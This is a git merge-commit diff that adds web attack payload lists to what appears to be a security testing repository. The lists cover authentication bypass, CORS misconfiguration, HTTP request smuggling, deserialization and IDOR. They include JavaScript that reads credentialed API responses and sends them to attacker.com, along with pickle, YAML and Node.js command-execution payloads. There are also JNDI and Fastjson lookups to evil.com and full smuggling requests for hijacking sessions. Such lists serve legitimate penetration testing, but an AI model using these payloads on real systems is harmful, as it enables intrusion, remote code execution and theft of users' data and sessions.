Merge pull request #7 from Stalin-143/copilot/add-vulnerabilities-and-payloads

Expand vulnerability payloads and add SSTI, HTTP Request Smuggling, CORS, and JWT attacks
2026-05-26 19:36:33 +00:00 · 2026-01-05 20:30:57 +05:30
parent 90c80a5303 b58ed035c8
commit bc17c119c6
17 changed files with 3097 additions and 0 deletions
@@ -45,3 +45,226 @@ X-Original-URL: /admin
 X-Rewrite-URL: /admin
 X-Originating-IP: 127.0.0.1
 X-Remote-Addr: 127.0.0.1
 X-Custom-IP-Authorization: 127.0.0.1
 X-Client-IP: 127.0.0.1
 X-Real-IP: 127.0.0.1
 X-Host: localhost
 X-Forwarded-Host: localhost
 # URL path manipulation
 /admin/..;/
 /admin/%2e%2e%3b/
 /./admin/./
 /admin;/
 /admin..
 //admin//
 /./admin/./panel
 /%2e/admin
 /admin/~
 /admin#
 /admin?
 # HTTP verb tampering
 GET /admin
 POST /admin
 HEAD /admin
 PUT /admin
 DELETE /admin
 OPTIONS /admin
 TRACE /admin
 PATCH /admin
 # Case manipulation
 /Admin
 /ADMIN
 /AdMiN
 /aDmIn
 # Unicode bypass
 /admin%c0%af
 /admin%e0%80%af
 /admin%c0%ae%c0%ae/
 /%61dmin
 # Double encoding
 /%252e%252e%252fadmin
 /%252e%252e/admin
 # Null byte injection
 /admin%00
 /admin%00.html
 /admin%00.jpg
 # Credential stuffing patterns
 admin:admin
 administrator:administrator
 root:root
 admin:password
 admin:123456
 admin:admin123
 test:test
 guest:guest
 user:user
 demo:demo
 # Default credentials bypass
 username=admin&password=
 username=&password=
 username=admin&password=%20
 username=admin&password=*
 # Password reset bypass
 email=victim@example.com&email=attacker@example.com
 token=&email=attacker@example.com
 token=0
 token=null
 token=false
 # OTP/2FA bypass
 otp=000000
 otp=123456
 otp=111111
 otp=
 otp=%20
 otp=null
 # Response manipulation
 # Change HTTP response from 401/403 to 200
 # Change "authenticated": false to "authenticated": true
 # Change "role": "user" to "role": "admin"
 # JWT manipulation (see JWT-Vulnerabilities for more)
 Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
 Authorization: Bearer null
 Authorization: Bearer 
 Authorization: 
 # GraphQL authentication bypass
 {"query":"mutation{login(username:\"admin\",password:\"' OR '1'='1\"){token}}"}
 {"query":"{users{id username password}}"}
 # XML authentication bypass
 <user><username>admin</username><password>' OR '1'='1</password></user>
 # LDAP authentication bypass
 username=*
 username=admin)(|(password=*
 username=*)(uid=*))(|(uid=*
 # OAuth/OIDC bypass
 redirect_uri=https://attacker.com
 state=
 nonce=
 code=
 # API key bypass
 api_key=
 X-API-Key: 
 Authorization: 
 apikey=null
 # Session fixation
 PHPSESSID=attacker_controlled_session
 jsessionid=12345
 # CAPTCHA bypass
 captcha=
 g-recaptcha-response=
 h-captcha-response=
 captcha_response=03AAYGu2...
 recaptcha=
 # Rate limiting bypass
 X-Forwarded-For: random_ip_each_request
 X-Originating-IP: random_ip_each_request
 X-Remote-IP: random_ip_each_request
 # Account enumeration
 username=admin&password=wrong
 username=nonexistent&password=wrong
 # Login form variations
 user[admin]=1
 user[role]=admin
 username[]=admin
 password[]=anything
 # Time-based bypass
 wait_for_rate_limit=true
 timestamp=future_date
 valid_until=9999999999
 # Magic hashes (PHP type juggling)
 # 0e215962017 == 0 (PHP)
 # 0e291242476940776845150308577824 == 0
 password=0e215962017
 password=240610708
 # Unicode normalization
 username=ⓐⓓⓜⓘⓝ
 username=𝒶𝒹𝓂𝒾𝓃
 username=ａｄｍｉｎ
 # Homograph attack
 username=αdmin (Greek alpha)
 username=аdmin (Cyrillic а)
 # Whitespace bypass
 username= admin
 username=admin 
 username=%20admin
 username=admin%20
 # Special characters
 username=admin'
 username=admin"
 username=admin`
 username=admin\
 # Email bypass for authentication
 email=admin@localhost
 email=admin@127.0.0.1
 email=@example.com
 email=victim@attacker.com
 # Host header authentication bypass
 Host: localhost
 Host: 127.0.0.1
 Host: internal.company.com
 # Referer bypass
 Referer: https://trusted-site.com
 Referer: https://localhost
 # Origin bypass
 Origin: https://trusted-site.com
 Origin: null
 # Authentication via GET instead of POST
 GET /api/login?username=admin&password=admin123
 # File inclusion for authentication bypass
 /etc/passwd
 ../../../../../../etc/passwd
 # SSRF to bypass authentication
 url=http://localhost/admin
 url=http://127.0.0.1/admin
 url=http://169.254.169.254/latest/meta-data/
 # Request smuggling for authentication bypass
 Content-Length: 0
 Transfer-Encoding: chunked
 # Race conditions
 # Send multiple authentication requests simultaneously
 # Business logic bypass
 step=1&step=3
 status=pending&status=approved
 verified=false&verified=true
 # Broken authentication chain
 # Skip step 2 in multi-step authentication
 # Reuse old session tokens
 # Replay old authentication requests
@@ -0,0 +1,35 @@
 # CORS Misconfiguration
 ## Description
 Cross-Origin Resource Sharing (CORS) misconfiguration occurs when a web application incorrectly configures the CORS headers, allowing unauthorized domains to access sensitive resources. This can lead to data theft, account compromise, and bypassing of the Same-Origin Policy.
 ## Common Misconfigurations
 - **Wildcard Origin with Credentials** - `Access-Control-Allow-Origin: *` with `Access-Control-Allow-Credentials: true`
 - **Null Origin Allowed** - Accepting `Origin: null`
 - **Reflected Origin** - Reflecting any origin without validation
 - **Subdomain Trust** - Trusting all subdomains including attacker-controlled ones
 - **Pre-domain/Post-domain Trust** - Weak regex matching for origins
 ## Impact
 - Steal sensitive user data
 - Perform actions on behalf of users
 - Access private API endpoints
 - Read authentication tokens
 - Bypass CSRF protections
 ## Common Attack Vectors
 - API endpoints with sensitive data
 - Authentication endpoints
 - Profile information endpoints
 - Admin panels
 - Internal APIs exposed via CORS
 ## Testing Approach
 1. Send requests with various `Origin` headers
 2. Check if `Access-Control-Allow-Origin` reflects the attacker's origin
 3. Verify if `Access-Control-Allow-Credentials: true` is set
 4. Test with null origin, subdomains, and similar domains
 5. Check for weak regex patterns in origin validation
 ## Payloads
 See `cors-misconfiguration-payloads.txt` for a comprehensive list of CORS misconfiguration test payloads.
@@ -0,0 +1,276 @@
 # CORS Misconfiguration Payloads
 # Basic Origin testing
 Origin: https://evil.com
 Origin: http://evil.com
 Origin: https://attacker.com
 Origin: http://attacker.com
 # Null Origin (works in sandboxed iframes)
 Origin: null
 # Subdomain variations
 Origin: https://evil.target.com
 Origin: https://target.com.evil.com
 Origin: https://subtarget.com
 Origin: https://admin.target.com
 Origin: https://api.target.com
 # Pre-domain bypass
 Origin: https://target.com.evil.com
 Origin: https://wwwtarget.com
 Origin: https://not-target.com
 Origin: https://target.com-evil.com
 Origin: https://target.com.attacker.com
 # Post-domain bypass
 Origin: https://evil.target.com
 Origin: https://evil-target.com
 Origin: https://eviltarget.com
 # Protocol variations
 Origin: http://target.com
 Origin: https://target.com
 Origin: ftp://target.com
 Origin: file://target.com
 # Port variations
 Origin: https://target.com:8080
 Origin: https://target.com:8443
 Origin: https://target.com:443
 Origin: https://target.com:80
 # Case sensitivity bypass
 Origin: https://TARGET.COM
 Origin: https://Target.Com
 Origin: https://TaRgEt.CoM
 # Underscore in subdomain
 Origin: https://evil_admin.target.com
 Origin: https://admin_.target.com
 # Special characters
 Origin: https://target.com%0d%0aEvil: header
 Origin: https://target.com%00.evil.com
 Origin: https://target.com@evil.com
 Origin: https://evil@target.com
 # Regex bypass patterns
 Origin: https://target.com.evil.com
 Origin: https://evil.target.com.net
 Origin: https://atarget.com
 Origin: https://target.com.de
 Origin: https://target.co.uk
 Origin: https://target.org
 # Localhost variations
 Origin: http://localhost
 Origin: http://127.0.0.1
 Origin: http://0.0.0.0
 Origin: http://[::1]
 Origin: http://localhost.target.com
 # File protocol
 Origin: file://
 Origin: file:///etc/passwd
 # Wildcard subdomain bypass
 Origin: https://anything.target.com
 Origin: https://xyz123.target.com
 Origin: https://hacker.target.com
 # Pre-flight request headers
 Access-Control-Request-Method: POST
 Access-Control-Request-Method: PUT
 Access-Control-Request-Method: DELETE
 Access-Control-Request-Method: PATCH
 Access-Control-Request-Headers: X-Custom-Header
 Access-Control-Request-Headers: Authorization
 Access-Control-Request-Headers: Content-Type
 # Data exfiltration payload (JavaScript)
 # For use when CORS is misconfigured
 var req = new XMLHttpRequest();
 req.open('GET', 'https://target.com/api/user/data', true);
 req.withCredentials = true;
 req.onload = function() {
  fetch('https://attacker.com/steal?data=' + btoa(req.responseText));
 };
 req.send();
 # Fetch API exploitation
 fetch('https://target.com/api/sensitive', {
  credentials: 'include'
 }).then(r => r.text()).then(data => {
  fetch('https://attacker.com/log?data=' + btoa(data));
 });
 # Testing for credential exposure
 GET /api/user HTTP/1.1
 Host: target.com
 Origin: https://evil.com
 Cookie: session=abc123
 # WebSocket CORS bypass
 var ws = new WebSocket('wss://target.com/socket');
 ws.onmessage = function(event) {
  fetch('https://attacker.com/log?data=' + btoa(event.data));
 };
 # Multiple Origin headers
 Origin: https://target.com
 Origin: https://evil.com
 # Origin with credentials
 Origin: https://user:pass@target.com
 Origin: https://admin@target.com
 # Homograph attacks (IDN)
 Origin: https://tаrget.com  # Cyrillic 'а'
 Origin: https://tаrgеt.com  # Cyrillic 'а' and 'е'
 Origin: https://targеt.com  # Cyrillic 'е'
 # Bypass via special TLDs
 Origin: https://target.com.local
 Origin: https://target.com.internal
 Origin: https://target.com.corp
 # IPv6 localhost variations
 Origin: http://[::1]
 Origin: http://[0:0:0:0:0:0:0:1]
 Origin: http://[0:0:0:0:0:0:0:0]
 Origin: http://[::ffff:127.0.0.1]
 # Private IP ranges
 Origin: http://192.168.1.1
 Origin: http://10.0.0.1
 Origin: http://172.16.0.1
 Origin: http://169.254.169.254
 # CORS with reflected subdomains
 Origin: https://xss.target.com
 Origin: https://<script>.target.com
 Origin: https://javascript:alert(1).target.com
 # Bypass with URL encoding
 Origin: https://%74%61%72%67%65%74.com
 Origin: https://target%2ecom
 # Double encoding
 Origin: https://%2574%2561%2572%2567%2565%2574.com
 # Unicode bypass
 Origin: https://ⓣⓐⓡⓖⓔⓣ.com
 Origin: https://𝓽𝓪𝓻𝓰𝓮𝓽.com
 # Testing Access-Control-Allow-Methods
 GET /api/admin HTTP/1.1
 Host: target.com
 Origin: https://evil.com
 Access-Control-Request-Method: DELETE
 # Testing Access-Control-Allow-Headers
 GET /api/user HTTP/1.1
 Host: target.com
 Origin: https://evil.com
 Access-Control-Request-Headers: X-Admin-Token
 # Cache poisoning via CORS
 GET /api/data HTTP/1.1
 Host: target.com
 Origin: https://evil.com
 X-Forwarded-Host: evil.com
 # CORS with authentication bypass
 GET /api/sensitive HTTP/1.1
 Host: target.com
 Origin: https://evil.com
 Cookie: session=victim_session_token
 # Testing weak regex patterns
 Origin: https://target.com.example.com
 Origin: https://example.target.com.example.com
 Origin: https://target_com.example.com
 Origin: https://target-com.example.com
 # Path traversal in Origin
 Origin: https://target.com/../../evil.com
 Origin: https://target.com/../evil.com
 # Fragment identifier bypass
 Origin: https://target.com#evil.com
 Origin: https://target.com#@evil.com
 # Query string in Origin (invalid but test anyway)
 Origin: https://target.com?evil.com
 Origin: https://target.com?redirect=evil.com
 # Bypassing with trailing characters
 Origin: https://target.com/
 Origin: https://target.com\
 Origin: https://target.com;
 Origin: https://target.com,
 # Mixed content bypass
 Origin: http://target.com (when site uses HTTPS)
 Origin: https://target.com (when site uses HTTP)
 # Testing with data URI
 Origin: data:text/html,<script>alert(1)</script>
 # Testing with javascript URI
 Origin: javascript:alert(1)
 # Origin with username
 Origin: https://admin:password@target.com
 # Testing with blob URI
 Origin: blob:https://target.com/uuid
 # Custom protocol
 Origin: custom://target.com
 Origin: app://target.com
 # Testing max-age for preflight
 Access-Control-Max-Age: 86400
 # Wildcard with specific paths
 Origin: https://evil.com/api/public
 # Testing exposed headers
 Access-Control-Expose-Headers: Authorization, X-API-Key
 # CORS on error pages
 GET /404 HTTP/1.1
 Host: target.com
 Origin: https://evil.com
 # CORS on redirect
 GET /redirect HTTP/1.1
 Host: target.com
 Origin: https://evil.com
 # Exploiting wildcard subdomains
 Origin: https://attacker-controlled.target.com
 Origin: https://s3bucket.target.com
 Origin: https://malicious.pages.target.com
 # Testing JSONP with CORS
 GET /api/data?callback=alert HTTP/1.1
 Host: target.com
 Origin: https://evil.com
 # WebRTC CORS bypass
 var pc = new RTCPeerConnection();
 pc.createDataChannel('');
 pc.createOffer().then(offer => pc.setLocalDescription(offer));
 # Service Worker CORS
 self.addEventListener('fetch', event => {
  event.respondWith(
    fetch(event.request.url, {
      mode: 'cors',
      credentials: 'include'
    })
  );
 });
@@ -53,3 +53,163 @@ Spring2
 # Ruby Marshal
 \x04\x08o:\x10User\x06:\x0arole:\x0aadmin
 # Advanced Java gadget chains
 # Apache Commons Collections
 org.apache.commons.collections.Transformer
 org.apache.commons.collections.functors.InvokerTransformer
 org.apache.commons.collections.functors.ChainedTransformer
 org.apache.commons.collections.functors.ConstantTransformer
 org.apache.commons.collections.keyvalue.TiedMapEntry
 org.apache.commons.collections.map.LazyMap
 # Spring Framework
 org.springframework.context.support.ClassPathXmlApplicationContext
 org.springframework.beans.factory.config.PropertyPathFactoryBean
 # C3P0
 com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase
 com.mchange.v2.c3p0.JndiRefForwardingDataSource
 # Hibernate
 org.hibernate.engine.spi.TypedValue
 org.hibernate.tuple.component.AbstractComponentTuplizer
 # Vaadin
 com.vaadin.data.util.NestedMethodProperty
 com.vaadin.data.util.PropertysetItem
 # Advanced PHP serialization
 O:8:"stdClass":1:{s:4:"code";s:10:"phpinfo();";}
 O:11:"PDOStatement":0:{}
 a:2:{i:0;O:8:"stdClass":0:{}i:1;s:5:"admin";}
 O:12:"SplFileObject":1:{s:0:"";s:11:"/etc/passwd";}
 # PHP object injection with magic methods
 O:10:"Evil_Class":1:{s:8:"filename";s:11:"/etc/passwd";}
 O:4:"User":2:{s:2:"id";i:1;s:4:"role";s:5:"admin";}
 O:7:"PhpCode":1:{s:4:"code";s:6:"system";}
 # Advanced Python pickle
 \x80\x03csubprocess\ncheck_output\n(S'ls'\ntR.
 \x80\x03csubprocess\nPopen\n(S'calc'\ntR.
 \x80\x03cos\nsystem\n(S'whoami'\ntR.
 cos\nsystem\n(S'cat /etc/passwd'\ntR.
 # Python pickle RCE variants
 c__builtin__\neval\n(S'__import__("os").system("ls")'\ntR.
 \x80\x03c__builtin__\nexec\n(S'import os;os.system("whoami")'\ntR.
 # .NET BinaryFormatter
 AAEAAAD/////AQAAAAAAAAAMAgAAAE1TeXN0ZW0u
 AAEAAAD/////AQAAAAAAAAAEAQAAAClT
 # .NET ObjectStateFormatter
 /wEy
 # .NET SoapFormatter
 <SOAP-ENV:Envelope
 # ViewState exploitation (.NET)
 __VIEWSTATE=/wEPDwUKLTY5NDY
 __VIEWSTATEGENERATOR=CA0B0334
 # JSON deserialization with type confusion
 {"$type":"System.Windows.Data.ObjectDataProvider, PresentationFramework"}
 {"__type":"System.IO.FileInfo"}
 {"@class":"java.net.URL","val":"http://evil.com"}
 # Jackson polymorphic deserialization
 ["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:"}]
 ["org.apache.xbean.propertyeditor.JndiConverter",{"asText":"ldap://evil.com/"}]
 ["com.sun.rowset.JdbcRowSetImpl",{"dataSourceName":"ldap://evil.com/","autoCommit":true}]
 # Fastjson exploitation
 {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://evil.com/Exploit","autoCommit":true}
 {"@type":"java.net.Inet4Address","val":"evil.com"}
 {"@type":"java.net.URL","val":"http://evil.com"}
 # YAML deserialization (Python)
 !!python/object/apply:subprocess.Popen [['calc']]
 !!python/object/new:os.system [calc]
 !!python/object/apply:os.system ['whoami']
 # YAML deserialization (Ruby)
 --- !ruby/object:Gem::Installer
 i: x
 --- !ruby/object:Gem::Requirement
 requirements: !ruby/object:Gem::Package::TarReader
 # Node.js prototype pollution
 {"__proto__":{"isAdmin":true}}
 {"constructor":{"prototype":{"isAdmin":true}}}
 {"__proto__":{"shell":"/bin/sh"}}
 # Node.js VM escape
 {"rce":"_$$ND_FUNC$$_function(){return require('child_process').execSync('whoami').toString()}()"}
 {"eval":"_$$ND_FUNC$$_function(){return global.process.mainModule.require('child_process').execSync('id').toString()}()"}
 # Ruby YAML deserialization
 --- !ruby/object:Gem::Installer\ni: x\n--- !ruby/object:Gem::SpecFetcher\ni: y
 !ruby/object:Gem::Requirement {requirements: [[!, !ruby/object:Gem::Package::TarReader {}}]}
 # Java RMI exploitation
 rmi://evil.com:1099/Object
 rmi://127.0.0.1:1099/Exploit
 # JNDI injection patterns
 ldap://evil.com/Exploit
 ldaps://evil.com/Exploit
 rmi://evil.com/Exploit
 dns://evil.com/Exploit
 iiop://evil.com/Exploit
 corba://evil.com/Exploit
 # Java gadget chain references
 ysoserial.payloads.CommonsCollections1
 ysoserial.payloads.CommonsCollections2
 ysoserial.payloads.CommonsCollections3
 ysoserial.payloads.CommonsCollections4
 ysoserial.payloads.CommonsCollections5
 ysoserial.payloads.CommonsCollections6
 ysoserial.payloads.CommonsCollections7
 ysoserial.payloads.Groovy1
 ysoserial.payloads.Spring1
 ysoserial.payloads.Spring2
 ysoserial.payloads.ROME
 ysoserial.payloads.JDK7u21
 ysoserial.payloads.Jython1
 ysoserial.payloads.Click1
 ysoserial.payloads.Wicket1
 # Base64 encoded Java serialized objects
 rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZQ==
 rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAU=
 rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldABA
 # PHP Phar deserialization
 phar://exploit.phar/test.txt
 phar://./exploit.phar
 phar://exploit.jpg/test.txt
 # AMF (Action Message Format)
 \x00\x03\x00\x00\x00\x01
 # MessagePack
 \x81\xa4eval\xa6system
 # Pickle bytecode patterns
 c__builtin__\ngetattr\n
 c__builtin__\n__import__\n
 cos\nsystem\n
 csubprocess\ncall\n
 csubprocess\ncheck_output\n
 # Serialization headers detection
 \xac\xed\x00\x05  # Java serialization
 O:  # PHP serialization
 \x80\x03  # Python pickle protocol 3
 \x80\x04  # Python pickle protocol 4
 \x04\x08  # Ruby Marshal
 AAEAAAD  # .NET BinaryFormatter
 /wE  # .NET ObjectStateFormatter
@@ -0,0 +1,41 @@
 # HTTP Request Smuggling
 ## Description
 HTTP Request Smuggling occurs when the front-end and back-end servers disagree about where one request ends and the next begins. This vulnerability allows attackers to bypass security controls, gain unauthorized access, and poison web caches.
 ## Vulnerability Types
 - **CL.TE** - Content-Length vs Transfer-Encoding
 - **TE.CL** - Transfer-Encoding vs Content-Length
 - **TE.TE** - Transfer-Encoding obfuscation
 - **CL.CL** - Duplicate Content-Length headers
 ## Common Attack Vectors
 - Front-end/Back-end server desynchronization
 - Load balancer misconfigurations
 - Reverse proxy issues
 - CDN edge servers
 - WAF bypass
 ## Impact
 - Bypass security controls
 - Web cache poisoning
 - Cross-site scripting
 - Request hijacking
 - Credential theft
 - Access other users' requests
 ## Testing Approach
 1. Send requests with conflicting Content-Length and Transfer-Encoding headers
 2. Observe timing differences and response variations
 3. Test with different header obfuscation techniques
 4. Verify if smuggled requests affect subsequent requests
 ## Common Vulnerable Configurations
 - HAProxy + Apache
 - Nginx + Apache
 - AWS ALB + various backends
 - Akamai + various backends
 - Cloudflare + various backends
 ## Payloads
 See `http-request-smuggling-payloads.txt` for a comprehensive list of HTTP Request Smuggling payloads.
@@ -0,0 +1,526 @@
 # HTTP Request Smuggling Payloads
 # CL.TE (Content-Length vs Transfer-Encoding)
 # Front-end uses Content-Length, back-end uses Transfer-Encoding
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 13
 Transfer-Encoding: chunked
 0
 SMUGGLED
 ---
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 6
 Transfer-Encoding: chunked
 0
 G
 ---
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 4
 Transfer-Encoding: chunked
 5c
 GPOST / HTTP/1.1
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 15
 x=1
 0
 ---
 # TE.CL (Transfer-Encoding vs Content-Length)
 # Front-end uses Transfer-Encoding, back-end uses Content-Length
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 3
 Transfer-Encoding: chunked
 8
 SMUGGLED
 0
 ---
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 4
 Transfer-Encoding: chunked
 5e
 POST /admin HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 10
 x=
 0
 ---
 # TE.TE (Transfer-Encoding obfuscation)
 # Both servers handle Transfer-Encoding but one can be obfuscated
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 4
 Transfer-Encoding: chunked
 Transfer-Encoding: cow
 5c
 GPOST / HTTP/1.1
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 15
 x=1
 0
 ---
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 4
 Transfer-Encoding: chunked
 Transfer-Encoding: x
 5c
 GPOST / HTTP/1.1
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 15
 x=1
 0
 ---
 # Transfer-Encoding obfuscation variants
 Transfer-Encoding: chunked
 Transfer-Encoding: xchunked
 Transfer-Encoding: chunked
 Transfer-Encoding: x
 Transfer-Encoding: chunked
 Transfer-encoding: chunked
 Transfer-Encoding: chunked 
 Transfer-Encoding: chunked;
 Transfer-Encoding: chunked,
 Transfer-Encoding: identity
 Transfer-Encoding: identity, chunked
 Transfer-Encoding: chunked, identity
 Transfer-Encoding: chunked
 Transfer-Encoding: identity
 Transfer-Encoding: chunked
 Transfer-Encoding : chunked
 Transfer-Encoding:chunked
 Transfer-Encoding:
 chunked
 Transfer-Encoding:
 	chunked
 [space]Transfer-Encoding: chunked
 Transfer-Encoding[space]: chunked
 Transfer-Encoding:[space]chunked
 Transfer-Encoding: chu nked
 Transfer-Encoding: chunk ed
 Transfer-Encoding: chun\x0bked
 # CL.CL (Duplicate Content-Length)
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 8
 Content-Length: 7
 12345
 SMUGGLED
 ---
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 8
 Content-Length: 9
 test=1
 SMUGGLED
 ---
 # Cache poisoning via request smuggling
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 130
 Transfer-Encoding: chunked
 0
 GET /static/script.js HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 10
 x=
 ---
 # Bypassing front-end security controls
 POST /login HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 100
 Transfer-Encoding: chunked
 0
 GET /admin HTTP/1.1
 Host: vulnerable-website.com
 X-Forwarded-For: 127.0.0.1
 Content-Length: 10
 x=
 ---
 # Capturing other users' requests
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 230
 Transfer-Encoding: chunked
 0
 POST /log HTTP/1.1
 Host: vulnerable-website.com
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 1000
 comment=
 ---
 # XSS via request smuggling
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 150
 Transfer-Encoding: chunked
 0
 GET /search?q=<script>alert(1)</script> HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 10
 x=
 ---
 # Web cache deception
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 180
 Transfer-Encoding: chunked
 0
 GET /static/include.js HTTP/1.1
 Host: vulnerable-website.com
 X-Ignore: X
 GET /account HTTP/1.1
 Host: vulnerable-website.com
 ---
 # Exploiting different chunk handling
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 4
 Transfer-Encoding: chunked
 96
 POST /admin HTTP/1.1
 Host: vulnerable-website.com
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 30
 csrf=token&action=delete
 0
 ---
 # Timing-based detection payload
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 4
 Transfer-Encoding: chunked
 1
 Z
 Q
 ---
 # Header injection for smuggling
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 200
 Transfer-Encoding: chunked
 0
 GET / HTTP/1.1
 Host: vulnerable-website.com
 X-Forwarded-Host: evil.com
 Content-Length: 10
 x=
 ---
 # Session hijacking
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 250
 Transfer-Encoding: chunked
 0
 POST /account/update HTTP/1.1
 Host: vulnerable-website.com
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 150
 email=attacker@evil.com&session=
 ---
 # Smuggling with newlines
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Transfer-Encoding:
 chunked
 Content-Length: 4
 5c
 SMUGGLED
 0
 ---
 # Smuggling with tabs
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Transfer-Encoding:	chunked
 Content-Length: 4
 5c
 SMUGGLED
 0
 ---
 # HTTP/2 downgrade smuggling
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Transfer-Encoding: chunked
 Content-Length: 4
 0
 SMUGGLED
 ---
 # Chunk size obfuscation
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Transfer-Encoding: chunked
 0000000000000000000a
 SMUGGLED123
 0
 ---
 # Negative Content-Length
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: -1
 Transfer-Encoding: chunked
 0
 SMUGGLED
 ---
 # Very large Content-Length
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 999999999
 Transfer-Encoding: chunked
 0
 SMUGGLED
 ---
 # Mixed line endings
 POST / HTTP/1.1\r\n
 Host: vulnerable-website.com\r\n
 Content-Length: 4\r\n
 Transfer-Encoding: chunked\n
 \r\n
 5c\r\n
 SMUGGLED\r\n
 0\r\n
 \r\n
 ---
 # Unicode in headers
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Transfer-Encoding: chunked
 Transfer‐Encoding: identity
 0
 SMUGGLED
 ---
 # Multiple Host headers
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Host: evil.com
 Content-Length: 4
 Transfer-Encoding: chunked
 0
 SMUGGLED
 ---
 # Smuggling to internal endpoints
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 150
 Transfer-Encoding: chunked
 0
 GET /internal/admin HTTP/1.1
 Host: localhost
 X-Forwarded-For: 127.0.0.1
 Content-Length: 10
 x=
 ---
 # Cookie injection via smuggling
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 180
 Transfer-Encoding: chunked
 0
 GET / HTTP/1.1
 Host: vulnerable-website.com
 Cookie: session=stolen_session_here
 Content-Length: 10
 x=
 ---
 # Authorization bypass
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 200
 Transfer-Encoding: chunked
 0
 GET /admin HTTP/1.1
 Host: vulnerable-website.com
 Authorization: Bearer admin_token_here
 Content-Length: 10
 x=
 ---
 # CRLF injection in chunks
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Transfer-Encoding: chunked
 0\r\n
 \r\n
 GET /admin HTTP/1.1\r\n
 Host: vulnerable-website.com\r\n
 \r\n
 ---
 # Smuggling via Content-Type
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 4
 Transfer-Encoding: chunked
 0
 SMUGGLED
 ---
 # Request line injection
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 150
 Transfer-Encoding: chunked
 0
 GPOST /admin HTTP/1.1
 Host: vulnerable-website.com
 Content-Length: 10
 x=
 ---
 # Protocol smuggling (HTTP/1.1 -> HTTP/2)
 POST / HTTP/1.1
 Host: vulnerable-website.com
 Upgrade: h2c
 Connection: Upgrade, HTTP2-Settings
 HTTP2-Settings: AAMAAABkAAQAAP__
 Content-Length: 4
 Transfer-Encoding: chunked
 0
 SMUGGLED
@@ -38,3 +38,180 @@
 # Array/Multiple IDs
 ?id[]=1&id[]=2
 ?ids=1,2,3
 # HTTP Methods for IDOR
 GET /api/user/1
 POST /api/user/1
 PUT /api/user/1
 DELETE /api/user/1
 PATCH /api/user/1
 # Path-based IDOR
 /users/1/profile
 /users/2/profile
 /users/admin/profile
 /api/v1/users/1
 /api/v1/users/2
 /api/v2/user/1/settings
 /api/user/1/private
 /api/user/2/documents
 # Subdomain enumeration
 user1.example.com
 user2.example.com
 admin.example.com
 # GUID/UUID variations
 ?id=00000000-0000-0000-0000-000000000000
 ?id=ffffffff-ffff-ffff-ffff-ffffffffffff
 ?id=12345678-1234-1234-1234-123456789012
 ?uuid=a1b2c3d4-e5f6-4a5b-8c7d-9e0f1a2b3c4d
 # Base64 encoded IDs
 ?id=MQ==
 ?id=Mg==
 ?id=YWRtaW4=
 ?user=dXNlcjE=
 # Hash-based IDs
 ?id=5f4dcc3b5aa765d61d8327deb882cf99
 ?id=098f6bcd4621d373cade4e832627b4f6
 ?token=abc123def456
 # Numeric variations
 ?id=0001
 ?id=0010
 ?id=0100
 ?id=1000
 ?user_id=00001
 ?customer_id=00100
 # Special characters in IDs
 ?id=../1
 ?id=../../2
 ?id=..%2f1
 ?id=%2e%2e%2f1
 # API endpoint variations
 /api/orders/1
 /api/orders/2
 /api/invoices/1
 /api/transactions/1
 /api/messages/1
 /api/posts/1/edit
 /api/comments/1/delete
 # Cookie-based IDOR
 Cookie: user_id=1
 Cookie: user_id=2
 Cookie: session_id=user1
 Cookie: account=1
 # Header-based IDOR
 X-User-Id: 1
 X-User-Id: 2
 X-Account-Id: 1
 X-Customer-Id: 2
 # JSON body IDOR
 {"user_id": 1}
 {"user_id": 2}
 {"account_id": 1}
 {"profile_id": 2}
 # Compound IDs
 ?user_id=1&account_id=1
 ?id=1&type=admin
 ?user=1&role=admin
